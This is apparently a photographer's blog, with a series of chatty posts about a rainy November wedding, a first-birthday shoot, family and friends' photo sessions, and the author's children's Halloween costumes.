what do peacock feathers, moustaches, vintage pearls and a rolls royce have in common? i’m so glad you asked. why, jeff & stephanie’s wedding, of course. it was a blustery november day, but nothing was going to dampen the spirits of these two. they trudged through mud and rain in the frigid cold because they were going to get married and the weather was not going to have a say in when, where or how it happened. and it happened beautifully.
there were certainly bumps along the way (i.e. a bridesmaid dress fiasco days before the wedding which had the mother-of-the-bride stuck behind a sewing machine and did i mention the reception ended up with the couple making a trip to the emergency room…?), but i’m sure everyone would agree it turned out to be a great day.
the ceremony was held in a gorgeous catholic church in aldergrove and even though movember was in full force amongst the groomsmen, everyone looked quite dapper.
there were so many pretty details from the bird adorned branches to the lights to the personalized wine bottles. their family and friends were quite the team, coming together to make everything perfect.
jeff & stephanie: i know not everything went as planned, but i feel like the picture above kind of sums it up. the two of you, walking into life surrounded by friends and family, embracing your circumstances with smiles on your faces. you two have an amazing future ahead.

this little princess is turning one. and when i say princess, i mean it: dressed to the nines, castle on a hill, doting “subjects”…she’s got it all.

it would not be even close to an exaggeration to say that these boys came bounding into this session. they were so excited. the photo on the top left is literally the first shot I took. off and running. and the thing i loved the most about this family was that they were prepared to be themselves! we played, we ran, we laughed, we cried (some tears due to actual sadness, some due to the frigid cold wind) and there was a lot of huddling and cuddling to keep warm. there was not a lot of posing, or “cheesing”…and to me, these pictures speak life!

so so glad i got to meet you!

these girls are no slouches. one is a dental assistant, one works for a “little software company” (she lives in washington, so i’ll let you guess which one) while the other is working on her doctorate. but even amazing, beautiful, strong, ambitious women need good friends. the kind that you don’t have to have known for long, but you know will be there no matter what. the kind that will make fools of themselves with you by hopping in a cart in the costco parking lot. um, what??
can you see what it says on the window?

this october, we had a lot of firsts. josiah went on his first horse ride. he also fought in his first epic sumo battle (do you see the size of the other kid?).
we also decided that that this year, the kids should dress up as real people. so allie was a police officer and josiah was…spiderman? he came home from school the week before halloween and said “so and so is dressing up as a teenage mutant ninja turtle. but spiderman is better.” “why is that?” i ask. “because spiderman is real”. and since i didn’t say anything in the moment, i feel kind of weird bringing it up now. i mean, the kid doesn’t believe in santa, so he’s gotta have something….right?
and since simon was the odd one out as an animal, we decided he could be an animal with a little latin flair.
what do you think his luchador name should be?
